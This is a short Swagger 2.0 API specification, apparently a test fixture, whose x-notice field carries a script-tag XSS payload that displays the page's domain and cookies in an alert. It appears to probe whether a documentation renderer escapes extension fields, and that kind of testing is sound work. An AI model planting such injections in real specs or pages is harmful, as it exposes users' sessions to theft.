swagger: '2.0'
info:
  title: Alert Test
  x-notice: |
    <script>
      alert('XSS from x-notice!\nDomain: ' + document.domain + '\nCookie: ' + document.cookie);
    </script>
  version: 1.0.0
paths: {}
